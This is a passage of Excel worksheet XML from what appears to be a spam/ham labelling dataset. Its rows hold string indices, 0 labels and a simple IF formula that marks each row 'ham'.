        <v>ham</v>
      </c>
    </row>
    <row r="3757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3757" t="s">
        <v>3141</v>
      </c>
      <c r="B3757">
        <v>0</v>
      </c>
      <c r="C3757" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3758" t="s">
        <v>3142</v>
      </c>
      <c r="B3758">
        <v>0</v>
      </c>
      <c r="C3758" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3759" t="s">
        <v>3143</v>
      </c>
      <c r="B3759">
        <v>0</v>
      </c>
      <c r="C3759" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3760" t="s">
        <v>3144</v>
      </c>
      <c r="B3760">
        <v>0</v>
      </c>
      <c r="C3760" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3761" t="s">
        <v>3145</v>
      </c>
      <c r="B3761">
        <v>0</v>
      </c>
      <c r="C3761" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3762" t="s">
        <v>3146</v>
      </c>
      <c r="B3762">
        <v>0</v>
      </c>
      <c r="C3762" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3763" t="s">
        <v>3147</v>
      </c>
      <c r="B3763">
        <v>0</v>
      </c>
      <c r="C3763" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3764" t="s">
        <v>3148</v>
      </c>
      <c r="B3764">
        <v>0</v>
      </c>
      <c r="C3764" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3765" t="s">
        <v>3149</v>
      </c>
      <c r="B3765">
        <v>0</v>
      </c>
      <c r="C3765" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3766" t="s">
        <v>3150</v>
      </c>
      <c r="B3766">
        <v>0</v>
      </c>
      <c r="C3766" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3767" t="s">
        <v>3151</v>
      </c>
      <c r="B3767">
        <v>0</v>
      </c>
      <c r="C3767" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3768" t="s">
        <v>3152</v>
      </c>
      <c r="B3768">
        <v>0</v>
      </c>
      <c r="C3768" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3769" t="s">
        <v>3153</v>
      </c>
      <c r="B3769">
        <v>0</v>
      </c>
      <c r="C3769" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3770" t="s">
        <v>3154</v>
      </c>
      <c r="B3770">
        <v>0</v>
      </c>
      <c r="C3770" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3771" t="s">
        <v>3155</v>
      </c>
      <c r="B3771">
        <v>0</v>
      </c>
      <c r="C3771" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3772" t="s">
        <v>3156</v>
      </c>
      <c r="B3772">
        <v>0</v>
      </c>
      <c r="C3772" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3773" t="s">
        <v>3157</v>
      </c>
      <c r="B3773">
        <v>0</v>
      </c>
      <c r="C3773" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3774" t="s">
        <v>3158</v>
      </c>
      <c r="B3774">
        <v>0</v>
      </c>
      <c r="C3774" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3775" t="s">
        <v>3159</v>
      </c>
      <c r="B3775">
        <v>0</v>
      </c>
      <c r="C3775" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3776" t="s">
        <v>3160</v>
      </c>
      <c r="B3776">
        <v>0</v>
      </c>
      <c r="C3776" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3777" t="s">
        <v>3161</v>
      </c>
      <c r="B3777">
        <v>0</v>
      </c>
      <c r="C3777" t="str">
        <f t="shared" si="58"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3778" t="s">
        <v>3162</v>
      </c>
      <c r="B3778">
        <v>0</v>
      </c>
      <c r="C3778" t="str">
        <f t="shared" ref="C3778:C3841" si="59">IF(B3778="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3779" t="s">
        <v>3163</v>
      </c>
      <c r="B3779">
        <v>0</v>
      </c>
      <c r="C3779" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3780" t="s">
        <v>3164</v>
      </c>
      <c r="B3780">
        <v>0</v>
      </c>
      <c r="C3780" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3781" t="s">
        <v>3165</v>
      </c>
      <c r="B3781">
        <v>0</v>
      </c>
      <c r="C3781" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3782" t="s">
        <v>3166</v>
      </c>
      <c r="B3782">
        <v>0</v>
      </c>
      <c r="C3782" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3783" t="s">
        <v>3167</v>
      </c>
      <c r="B3783">
        <v>0</v>
      </c>
      <c r="C3783" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3784" t="s">
        <v>3168</v>
      </c>
      <c r="B3784">
        <v>0</v>
      </c>
      <c r="C3784" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3785" t="s">
        <v>3169</v>
      </c>
      <c r="B3785">
        <v>0</v>
      </c>
      <c r="C3785" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3786" t="s">
        <v>3170</v>
      </c>
      <c r="B3786">
        <v>0</v>
      </c>
      <c r="C3786" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3787" t="s">
        <v>3171</v>
      </c>
      <c r="B3787">
        <v>0</v>
      </c>
      <c r="C3787" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3788" t="s">
        <v>3172</v>
      </c>
      <c r="B3788">
        <v>0</v>
      </c>
      <c r="C3788" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3789" t="s">
        <v>3173</v>
      </c>
      <c r="B3789">
        <v>0</v>
      </c>
      <c r="C3789" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3790" t="s">
        <v>3174</v>
      </c>
      <c r="B3790">
        <v>0</v>
      </c>
      <c r="C3790" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3791" t="s">
        <v>3175</v>
      </c>
      <c r="B3791">
        <v>0</v>
      </c>
      <c r="C3791" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3792" t="s">
        <v>3176</v>
      </c>
      <c r="B3792">
        <v>0</v>
      </c>
      <c r="C3792" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3793" t="s">
        <v>3177</v>
      </c>
      <c r="B3793">
        <v>0</v>
      </c>
      <c r="C3793" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3794" t="s">
        <v>3178</v>
      </c>
      <c r="B3794">
        <v>0</v>
      </c>
      <c r="C3794" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3795" t="s">
        <v>3179</v>
      </c>
      <c r="B3795">
        <v>0</v>
      </c>
      <c r="C3795" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3796" t="s">
        <v>3180</v>
      </c>
      <c r="B3796">
        <v>0</v>
      </c>
      <c r="C3796" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3797" t="s">
        <v>3181</v>
      </c>
      <c r="B3797">
        <v>0</v>
      </c>
      <c r="C3797" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3798" t="s">
        <v>3182</v>
      </c>
      <c r="B3798">
        <v>0</v>
      </c>
      <c r="C3798" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3799" t="s">
        <v>3183</v>
      </c>
      <c r="B3799">
        <v>0</v>
      </c>
      <c r="C3799" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3800" t="s">
        <v>3184</v>
      </c>
      <c r="B3800">
        <v>0</v>
      </c>
      <c r="C3800" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3801" t="s">
        <v>3185</v>
      </c>
      <c r="B3801">
        <v>0</v>
      </c>
      <c r="C3801" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3802" t="s">
        <v>3186</v>
      </c>
      <c r="B3802">
        <v>0</v>
      </c>
      <c r="C3802" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3803" t="s">
        <v>3187</v>
      </c>
      <c r="B3803">
        <v>0</v>
      </c>
      <c r="C3803" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3804" t="s">
        <v>3188</v>
      </c>
      <c r="B3804">
        <v>0</v>
      </c>
      <c r="C3804" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3805" t="s">
        <v>3189</v>
      </c>
      <c r="B3805">
        <v>0</v>
      </c>
      <c r="C3805" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3806" t="s">
        <v>3190</v>
      </c>
      <c r="B3806">
        <v>0</v>
      </c>
      <c r="C3806" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3807" t="s">
        <v>3191</v>
      </c>
      <c r="B3807">
        <v>0</v>
      </c>
      <c r="C3807" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3808" t="s">
        <v>3192</v>
      </c>
      <c r="B3808">
        <v>0</v>
      </c>
      <c r="C3808" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3809" t="s">
        <v>3193</v>
      </c>
      <c r="B3809">
        <v>0</v>
      </c>
      <c r="C3809" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3810" t="s">
        <v>3194</v>
      </c>
      <c r="B3810">
        <v>0</v>
      </c>
      <c r="C3810" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3811" t="s">
        <v>3195</v>
      </c>
      <c r="B3811">
        <v>0</v>
      </c>
      <c r="C3811" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3812" t="s">
        <v>3196</v>
      </c>
      <c r="B3812">
        <v>0</v>
      </c>
      <c r="C3812" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3813" t="s">
        <v>3197</v>
      </c>
      <c r="B3813">
        <v>0</v>
      </c>
      <c r="C3813" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3814" t="s">
        <v>3198</v>
      </c>
      <c r="B3814">
        <v>0</v>
      </c>
      <c r="C3814" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3815" t="s">
        <v>3199</v>
      </c>
      <c r="B3815">
        <v>0</v>
      </c>
      <c r="C3815" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3816" t="s">
        <v>3200</v>
      </c>
      <c r="B3816">
        <v>0</v>
      </c>
      <c r="C3816" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3817" t="s">
        <v>3201</v>
      </c>
      <c r="B3817">
        <v>0</v>
      </c>
      <c r="C3817" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3818" t="s">
        <v>3202</v>
      </c>
      <c r="B3818">
        <v>0</v>
      </c>
      <c r="C3818" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3819" t="s">
        <v>3203</v>
      </c>
      <c r="B3819">
        <v>0</v>
      </c>
      <c r="C3819" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3820" t="s">
        <v>3204</v>
      </c>
      <c r="B3820">
        <v>0</v>
      </c>
      <c r="C3820" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3821" t="s">
        <v>3205</v>
      </c>
      <c r="B3821">
        <v>0</v>
      </c>
      <c r="C3821" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3822" t="s">
        <v>3206</v>
      </c>
      <c r="B3822">
        <v>0</v>
      </c>
      <c r="C3822" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3823" t="s">
        <v>3207</v>
      </c>
      <c r="B3823">
        <v>0</v>
      </c>
      <c r="C3823" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3824" t="s">
        <v>3208</v>
      </c>
      <c r="B3824">
        <v>0</v>
      </c>
      <c r="C3824" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3825" t="s">
        <v>3209</v>
      </c>
      <c r="B3825">
        <v>0</v>
      </c>
      <c r="C3825" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3826" t="s">
        <v>3210</v>
      </c>
      <c r="B3826">
        <v>0</v>
      </c>
      <c r="C3826" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3827" t="s">
        <v>3211</v>
      </c>
      <c r="B3827">
        <v>0</v>
      </c>
      <c r="C3827" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3828" t="s">
        <v>3212</v>
      </c>
      <c r="B3828">
        <v>0</v>
      </c>
      <c r="C3828" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3829" t="s">
        <v>3213</v>
      </c>
      <c r="B3829">
        <v>0</v>
      </c>
      <c r="C3829" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3830" t="s">
        <v>3214</v>
      </c>
      <c r="B3830">
        <v>0</v>
      </c>
      <c r="C3830" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3831" t="s">
        <v>3215</v>
      </c>
      <c r="B3831">
        <v>0</v>
      </c>
      <c r="C3831" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3832" t="s">
        <v>3216</v>
      </c>
      <c r="B3832">
        <v>0</v>
      </c>
      <c r="C3832" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3833" t="s">
        <v>3217</v>
      </c>
      <c r="B3833">
        <v>0</v>
      </c>
      <c r="C3833" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3834" t="s">
        <v>3218</v>
      </c>
      <c r="B3834">
        <v>0</v>
      </c>
      <c r="C3834" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3835" t="s">
        <v>3219</v>
      </c>
      <c r="B3835">
        <v>0</v>
      </c>
      <c r="C3835" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3836" t="s">
        <v>3220</v>
      </c>
      <c r="B3836">
        <v>0</v>
      </c>
      <c r="C3836" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3837" t="s">
        <v>3221</v>
      </c>
      <c r="B3837">
        <v>0</v>
      </c>
      <c r="C3837" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3838" t="s">
        <v>3222</v>
      </c>
      <c r="B3838">
        <v>0</v>
      </c>
      <c r="C3838" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3839" t="s">
        <v>3223</v>
      </c>
      <c r="B3839">
        <v>0</v>
      </c>
      <c r="C3839" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3840" t="s">
        <v>3224</v>
      </c>
      <c r="B3840">
        <v>0</v>
      </c>
      <c r="C3840" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3841" t="s">
        <v>3225</v>
      </c>
      <c r="B3841">
        <v>0</v>
      </c>
      <c r="C3841" t="str">
        <f t="shared" si="59"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3842" t="s">
        <v>3226</v>
      </c>
      <c r="B3842">
        <v>0</v>
      </c>
      <c r="C3842" t="str">
        <f t="shared" ref="C3842:C3905" si="60">IF(B3842="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3843" t="s">
        <v>3227</v>
      </c>
      <c r="B3843">
        <v>0</v>
      </c>
      <c r="C3843" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3844" t="s">
        <v>3228</v>
      </c>
      <c r="B3844">
        <v>0</v>
      </c>
      <c r="C3844" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3845" t="s">
        <v>3229</v>
      </c>
      <c r="B3845">
        <v>0</v>
      </c>
      <c r="C3845" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3846" t="s">
        <v>3230</v>
      </c>
      <c r="B3846">
        <v>0</v>
      </c>
      <c r="C3846" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3847" t="s">
        <v>3231</v>
      </c>
      <c r="B3847">
        <v>0</v>
      </c>
      <c r="C3847" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3848" t="s">
        <v>3232</v>
      </c>
      <c r="B3848">
        <v>0</v>
      </c>
      <c r="C3848" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3849" t="s">
        <v>3233</v>
      </c>
      <c r="B3849">
        <v>0</v>
      </c>
      <c r="C3849" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3850" t="s">
        <v>3234</v>
      </c>
      <c r="B3850">
        <v>0</v>
      </c>
      <c r="C3850" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3851" t="s">
        <v>3235</v>
      </c>
      <c r="B3851">
        <v>0</v>
      </c>
      <c r="C3851" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3852" t="s">
        <v>3236</v>
      </c>
      <c r="B3852">
        <v>0</v>
      </c>
      <c r="C3852" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3853" t="s">
        <v>3237</v>
      </c>
      <c r="B3853">
        <v>0</v>
      </c>
      <c r="C3853" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3854" t="s">
        <v>3238</v>
      </c>
      <c r="B3854">
        <v>0</v>
      </c>
      <c r="C3854" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3855" t="s">
        <v>3239</v>
      </c>
      <c r="B3855">
        <v>0</v>
      </c>
      <c r="C3855" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3856" t="s">
        <v>3240</v>
      </c>
      <c r="B3856">
        <v>0</v>
      </c>
      <c r="C3856" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3857" t="s">
        <v>3241</v>
      </c>
      <c r="B3857">
        <v>0</v>
      </c>
      <c r="C3857" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3858" t="s">
        <v>3242</v>
      </c>
      <c r="B3858">
        <v>0</v>
      </c>
      <c r="C3858" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3859" t="s">
        <v>3243</v>
      </c>
      <c r="B3859">
        <v>0</v>
      </c>
      <c r="C3859" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3860" t="s">
        <v>3244</v>
      </c>
      <c r="B3860">
        <v>0</v>
      </c>
      <c r="C3860" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3861" t="s">
        <v>3245</v>
      </c>
      <c r="B3861">
        <v>0</v>
      </c>
      <c r="C3861" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3862" t="s">
        <v>3246</v>
      </c>
      <c r="B3862">
        <v>0</v>
      </c>
      <c r="C3862" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3863" t="s">
        <v>3247</v>
      </c>
      <c r="B3863">
        <v>0</v>
      </c>
      <c r="C3863" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3864" t="s">
        <v>3248</v>
      </c>
      <c r="B3864">
        <v>0</v>
      </c>
      <c r="C3864" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3865" t="s">
        <v>3249</v>
      </c>
      <c r="B3865">
        <v>0</v>
      </c>
      <c r="C3865" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3866" t="s">
        <v>3250</v>
      </c>
      <c r="B3866">
        <v>0</v>
      </c>
      <c r="C3866" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3867" t="s">
        <v>3251</v>
      </c>
      <c r="B3867">
        <v>0</v>
      </c>
      <c r="C3867" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3868" t="s">
        <v>3252</v>
      </c>
      <c r="B3868">
        <v>0</v>
      </c>
      <c r="C3868" t="str">
        <f t="shared" si="60"/>
        <v>ham</v>
      </c>
    </row>
